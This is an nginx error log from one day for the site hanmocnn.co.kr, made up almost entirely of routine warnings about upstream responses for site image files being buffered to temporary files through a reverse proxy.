2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/00/0000016007 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/00/0000016008 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/00/0000016009 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/01/0000016010 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/01/0000016011 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/instrument.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/instrument.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 01:06:51 [warn] 939#939: *93397 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/01/0000016012 while reading upstream, client: 205.169.39.217, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 01:09:32 [warn] 939#939: *93413 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/01/0000016013 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 01:09:32 [warn] 939#939: *93413 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/01/0000016014 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 01:09:32 [warn] 939#939: *93413 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/01/0000016015 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 01:14:03 [warn] 939#939: *93430 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/01/0000016016 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 01:14:03 [warn] 939#939: *93430 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/01/0000016017 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 01:19:21 [warn] 939#939: *93446 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/01/0000016018 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 01:19:21 [warn] 939#939: *93446 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/01/0000016019 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 01:19:21 [warn] 939#939: *93446 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/02/0000016020 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 01:19:21 [warn] 939#939: *93446 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/02/0000016021 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 02:27:03 [warn] 943#943: *93497 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/02/0000016022 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 02:27:03 [warn] 943#943: *93497 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/02/0000016023 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/instrument.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/instrument.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 02:27:03 [warn] 943#943: *93497 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/02/0000016024 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 02:31:14 [warn] 943#943: *93510 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/02/0000016025 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 02:31:14 [warn] 943#943: *93510 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/02/0000016026 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 02:31:14 [warn] 943#943: *93510 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/02/0000016027 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 02:40:23 [warn] 943#943: *93561 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/02/0000016028 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 02:40:23 [warn] 943#943: *93561 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/02/0000016029 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 02:40:23 [warn] 943#943: *93561 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/03/0000016030 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 03:38:50 [warn] 941#941: *93665 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/03/0000016032 while reading upstream, client: 149.57.180.66, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 03:38:50 [warn] 941#941: *93665 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/03/0000016033 while reading upstream, client: 149.57.180.66, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 07:03:10 [warn] 952#952: *96830 using uninitialized "server" variable while logging request, client: 51.159.107.135, server: hanmocnn.co.kr, request: "HEAD / HTTP/1.1", host: "www.hanmocnn.co.kr:443"
2026/02/18 07:03:13 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/52/0000017521 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 07:03:13 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/52/0000017522 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 07:03:14 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/52/0000017523 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 07:03:14 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/52/0000017524 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 07:03:14 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/52/0000017525 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/reactor.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/reactor.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 07:03:14 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/52/0000017526 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 07:03:14 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/52/0000017527 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 07:03:14 [warn] 952#952: *96831 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/52/0000017528 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/instrument.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/instrument.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 07:03:19 [warn] 952#952: *96846 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/52/0000017529 while reading upstream, client: 51.159.107.135, server: hanmocnn.co.kr, request: "GET /assets/images/favicon.ico HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/favicon.ico", host: "www.hanmocnn.co.kr"
2026/02/18 11:02:30 [warn] 956#956: *97013 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/53/0000017530 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 11:03:58 [warn] 956#956: *97013 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/53/0000017531 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 11:03:58 [warn] 956#956: *97013 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/53/0000017532 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 11:05:50 [warn] 956#956: *97059 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/53/0000017533 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 11:05:50 [warn] 956#956: *97059 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/53/0000017534 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 11:05:50 [warn] 956#956: *97059 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/53/0000017535 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 11:08:58 [warn] 956#956: *98564 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/27/0000018279 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 11:08:58 [warn] 956#956: *98564 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/28/0000018280 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 11:08:58 [warn] 956#956: *98564 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/28/0000018281 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 11:10:42 [warn] 956#956: *98580 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/28/0000018282 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 11:10:42 [warn] 956#956: *98580 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/28/0000018283 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 11:10:42 [warn] 956#956: *98580 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/28/0000018284 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 11:51:49 [warn] 956#956: *98620 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/28/0000018285 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 11:51:49 [warn] 956#956: *98620 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/28/0000018286 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 11:51:50 [warn] 956#956: *98620 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/28/0000018287 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 11:54:25 [warn] 951#951: *98649 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/28/0000018288 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 11:54:25 [warn] 951#951: *98649 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/28/0000018289 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom7.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom7.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 11:55:44 [warn] 951#951: *98649 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/29/0000018290 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 11:55:44 [warn] 951#951: *98649 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/29/0000018291 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 11:55:44 [warn] 951#951: *98649 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/29/0000018292 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 12:15:42 [warn] 962#962: *98740 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/29/0000018293 while reading upstream, client: 68.183.27.37, server: hanmocnn.co.kr, request: "GET /assets/images/favicon.ico HTTP/1.1", upstream: "http://192.168.0.250:8081/assets/images/favicon.ico", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 12:44:35 [warn] 962#962: *98749 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/29/0000018294 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 12:46:12 [warn] 962#962: *98779 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/29/0000018295 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 12:46:12 [warn] 962#962: *98779 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/29/0000018296 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 12:46:12 [warn] 962#962: *98779 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/29/0000018297 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:06:12 [warn] 962#962: *98801 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/29/0000018298 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:06:12 [warn] 962#962: *98801 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/29/0000018299 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:06:12 [warn] 962#962: *98801 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/30/0000018300 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:06:12 [warn] 962#962: *98801 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/30/0000018301 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:09:23 [warn] 962#962: *98816 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/30/0000018302 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:09:23 [warn] 962#962: *98816 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/30/0000018303 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/BatchControl.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/BatchControl.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:09:23 [warn] 962#962: *98816 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/30/0000018304 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:09:23 [warn] 962#962: *98816 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/30/0000018305 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/bearing.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/bearing.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:09:31 [warn] 962#962: *98816 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/30/0000018306 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:15:10 [warn] 961#961: *100349 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/05/0000019050 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/ControlRoom3.png HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/ControlRoom3.png", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
2026/02/18 13:15:10 [warn] 961#961: *100349 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/05/0000019051 while reading upstream, client: 222.117.41.51, server: hanmocnn.co.kr, request: "GET /assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:8081/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "www.hanmocnn.co.kr", referrer: "https://www.hanmocnn.co.kr/"
